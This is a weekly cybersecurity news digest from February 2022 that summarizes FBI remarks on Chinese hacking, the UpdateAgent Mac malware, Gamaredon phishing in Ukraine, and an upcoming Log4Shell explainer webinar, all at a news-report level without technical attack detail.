China Cyber Attacks, Log4Shell Webinar, Mac Malware, and Russia vs Ukraine
Friday, February 4th, 2022
Welcome to HackerHub
As per usual, welcome to another edition of Hacker News and enjoy this week’s curated list of articles. Found below, you’ll get some really awesome content that we put together and made specifically for you.
Finally, Hacker News is in the process of officially being rebranded as HackerHub. Pretty dope, right? Anywho, just be on the lookout for HackerHub instead of Hacker News in your inbox from hence forth! Today the email is being sent from the Hacker News name, but next week it will be different.
Cheers!
William
General News of the Week
China Generates More Cyber Attacks Than Everywhere Else Combined
In a Monday speech titled Countering Threats Posed by the Chinese Government Inside the US, Wray said the FBI is probing over 2,000 investigations of incidents assessed as attempts by China's government "to steal our information and technology."
"The Chinese government steals staggering volumes of information and causes deep, job-destroying damage across a wide range of industries – so much so that, as you heard, we're constantly opening new cases to counter their intelligence operations, about every 12 hours or so."
"They're not just hacking on a huge scale but causing indiscriminate damage to get to what they want. Like in the recent Microsoft Exchange hack, which compromised the networks of more than 10,000 American companies in a single campaign alone," he added.
Wray said China sometimes directs attacks by government-owned companies but doesn't have to rely on such entities because businesses are required to maintain a Communist Party Committee comprised of Party members who are placed in senior management positions. "Within China, they force US companies to partner with Chinese government-owned ones to do business in China, and then abuse and exploit those partnerships," Wray added.
Mac Malware is Now Dropping Adware… Getting More Dangerous
What malware are we talking about? UpdateAgent
The malware, which impersonates legitimate software, such as support agents and video software, first surfaced in September 2020. It is commonly distributed via drive-by downloads or pop-ups for advertisements and fake updates for tools like the long-discontinued Adobe Flash Player. Since it first emerged, UpdateAgent's authors have constantly updated it with significant new functionality.
Researchers from Microsoft analyzed the latest variant and found it contained an expanded capability for installing secondary payloads hosted on trusted public cloud infrastructures, such as Amazon S3 and CloudFront. Instead of using either .zip files or mountable disk images (DMG files) to fetch additional payloads like it had previously, the new version of UpdateAgent now can use both file types.
The October version of UpdateAgent/WizardUpdate is its fifth iteration. The first one in September 2020 was simple and designed to collect basic information about the device on which it was installed and to stay in touch with a remote command-and-control (C2) server. In the next few versions, the authors of the malware added features for fetching secondary payloads, maintaining persistence, and, importantly, bypassing Gatekeeper, a macOS technology for ensuring that only trusted software can run on a Mac.
Russian Gamaredon Hackers Targeted 'Western Government Entity' in Ukraine
The Russia-linked Gamaredon hacking group attempted to compromise an unnamed Western government entity operating in Ukraine last month amidst ongoing geopolitical tensions between the two countries.
Palo Alto Networks' Unit 42 threat intelligence team, in a new report publicized on February 3, said that the phishing attack took place on January 19, adding it "mapped out three large clusters of their infrastructure used to support different phishing and malware purposes."
Additionally, Unit 42 uncovered evidence of a Gamaredon campaign targeting the State Migration Service (SMS) of Ukraine on December 1, 2021, which used a Word document as a lure to install the open-source UltraVNC virtual network computing (VNC) software for maintaining remote access to infected computers.
Log4Shell Explanation Webinar - What is it??
Most security practitioners are now aware of the Log4Shell vulnerability discovered toward the end of 2021. No one knows how long the vulnerability existed before it was discovered. The past couple of months have had security teams scrambling to patch the Log4Shell vulnerability found in Apache Log4j, a Java library widely used to log error messages in applications. Beyond patching, it's helpful and instructive for security practitioners to have a deeper understanding of this most recent critical vulnerability.
Fortunately, Cynet Senior Security Researcher Igor Lahav is hosting a webinar [Register here] to provide "buzzword free" insights into Log4Shell. Based on a webinar preview provided by Cynet, the discussion will cover the software bugs in Apache Log4j that permitted the critical vulnerability, the exploits used to take advantage of the vulnerabilities and the remediation options available to protect your organization. This webinar will help make sense of the sometimes overly technical analysis of Log4Shell we've been subject to over the past couple of months.